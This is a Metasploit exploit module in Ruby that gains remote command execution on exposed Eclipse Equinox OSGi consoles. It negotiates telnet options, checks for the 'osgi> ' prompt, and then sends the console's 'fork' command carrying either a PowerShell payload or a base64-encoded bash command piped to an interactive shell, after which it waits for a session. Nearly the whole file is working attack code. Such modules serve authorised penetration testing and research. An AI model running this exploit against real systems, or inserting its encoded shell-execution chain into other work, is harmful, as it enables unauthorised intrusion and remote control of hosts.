Path: blob/master/modules/exploits/multi/misc/osgi_console_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'base64'

# Eclipse Equinox OSGi console command execution.
#
# The module talks to the OSGi console over a raw TCP socket (Msf::Exploit::Remote::Tcp),
# answers the console's telnet option negotiation, and then issues the console's
# 'fork' command. Staging for the Linux target goes through Msf::Exploit::CmdStager
# (bourne flavor); the Windows target uses a PowerShell one-liner built by
# Msf::Exploit::Powershell.
#
# For defenders: the only network-visible fingerprint this module relies on is the
# bare "osgi> " prompt on the console port, so an exposed console with that prompt
# is what `check` reports as vulnerable.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  # Short alias for the telnet protocol constants (IAC, WILL, DO, SB, SE, OPT_*)
  # used in the option-negotiation exchanges below.
  TELNET_IAC = Msf::Exploit::Remote::Telnet

  # Registers module metadata and options.
  #
  # The HTTP-server options inherited via the mixins (SRVHOST, SRVPORT, SSL,
  # SSLCert, URIPATH) are deregistered because this module never starts a
  # listener; the only module-specific option is TIME_WAIT, the number of
  # seconds `exploit` polls for a session before returning.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Eclipse Equinox OSGi Console Command Execution',
        'Description' => %q{
          Exploit Eclipse Equinox OSGi (Open Service Gateway initiative) console
          'fork' command to execute arbitrary commands on the remote system.
        },
        'Author' => [
          'Quentin Kaiser <[email protected]>'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
        ],
        'Platform' => %w{linux win},
        'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
          [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
        ],
        'CmdStagerFlavor' => [ 'bourne' ],
        'DisclosureDate' => '2018-02-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
    register_options([
      OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
    ])
  end

  # Connects to the console port and decides whether it looks like an OSGi console.
  #
  # Flow: read the first thing the server sends; if it is exactly the telnet
  # option sequence WILL ECHO, WILL SGA, DO NAWS, DO TTYPE, answer the TTYPE
  # request with a terminal-type subnegotiation and read again. The connection
  # is then closed and the result is Vulnerable only when the final read is
  # exactly the bare prompt "osgi> ".
  #
  # Both comparisons are whole-string equality, so a console that negotiates a
  # different option set, or prints any banner text before the prompt, is
  # reported Safe. Connection/read errors are not rescued here; they propagate
  # to the caller (`exploit` rescues Rex connection errors around its call).
  #
  # @return [Exploit::CheckCode] Vulnerable or Safe
  def check
    connect
    res = sock.get_once
    if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \
              TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE
      # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
      # The leading \x00 is the TTYPE "IS" subnegotiation code that precedes the name.
      sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \
               "\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)
      res = sock.get_once
    end
    disconnect
    if res && res == "osgi> "
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Main entry point.
  #
  # Aborts with Failure::NoTarget unless `check` returns Vulnerable. For the
  # Windows target a PowerShell command built from the encoded payload is passed
  # directly to `fork`; for the Linux target the bourne-flavor CmdStager is
  # used, which calls `execute_command` below for each staged command. After
  # sending, the module sleeps up to TIME_WAIT seconds (1s steps), stopping
  # early once `session_created?` is true.
  #
  # Connection-level errors (timeouts, refused/unreachable host) from either
  # `check` or the command sends are converted into Failure::Unknown; the
  # socket is always closed in `ensure`.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on NoTarget or connection errors
  def exploit
    begin
      print_status("Accessing the OSGi console ...")

      unless check == Exploit::CheckCode::Vulnerable
        fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
      end

      if target['Platform'] == "win" then
        # encode_final_payload/remove_comspec are Powershell mixin options; the
        # whole PowerShell invocation is passed as a single quoted 'fork' argument.
        exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, { encode_final_payload: true, remove_comspec: true })}\"")
      else
        execute_cmdstager({ :flavor => :bourne })
      end

      print_status("#{rhost}:#{rport} - Waiting for session...")

      (datastore['TIME_WAIT']).times do
        Rex.sleep(1)
        # Success! session is here!
        break if session_created?
      end
    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
    ensure
      disconnect
    end
  end

  # Sends one console command over a fresh connection.
  #
  # Repeats the same telnet option handshake as `check` (answering DO TTYPE with
  # "xterm-256color"), writes `cmd` followed by CRLF, then sends "disconnect"
  # and "y". The values read from the socket are assigned but never used; the
  # reads only drain the console's output between writes.
  #
  # NOTE(review): "y" is presumably the answer to the console's disconnect
  # confirmation prompt — confirm against the target console version.
  #
  # @param cmd [String] full console command line, e.g. a 'fork ...' command
  # @return [Object] the result of the last sock.put (not meaningful to callers)
  def exec_command(cmd)
    connect
    res = sock.get_once
    if res == TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO + \
              TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA + \
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS + \
              TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE
      sock.put(TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE + \
               "\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE)
      res = sock.get_once
    end
    print_status("Exploiting...")
    sock.put("#{cmd}\r\n")
    res = sock.get
    sock.put("disconnect\r\n")
    res = sock.get
    sock.put("y\r\n")
  end

  # CmdStager hook: wraps a staged shell command for the console's 'fork' command.
  #
  # The command is base64-encoded with all whitespace removed and decoded again
  # on the target by bash before execution; see the author's note below on why
  # the plain command is not passed directly.
  #
  # @param cmd [String] shell command produced by the CmdStager
  # @param opts [Hash] stager options (unused here)
  def execute_command(cmd, opts = {})
    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
    # Runtime.getRuntime().exec() workaround on Linux. Requires bash.
    exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
  end
end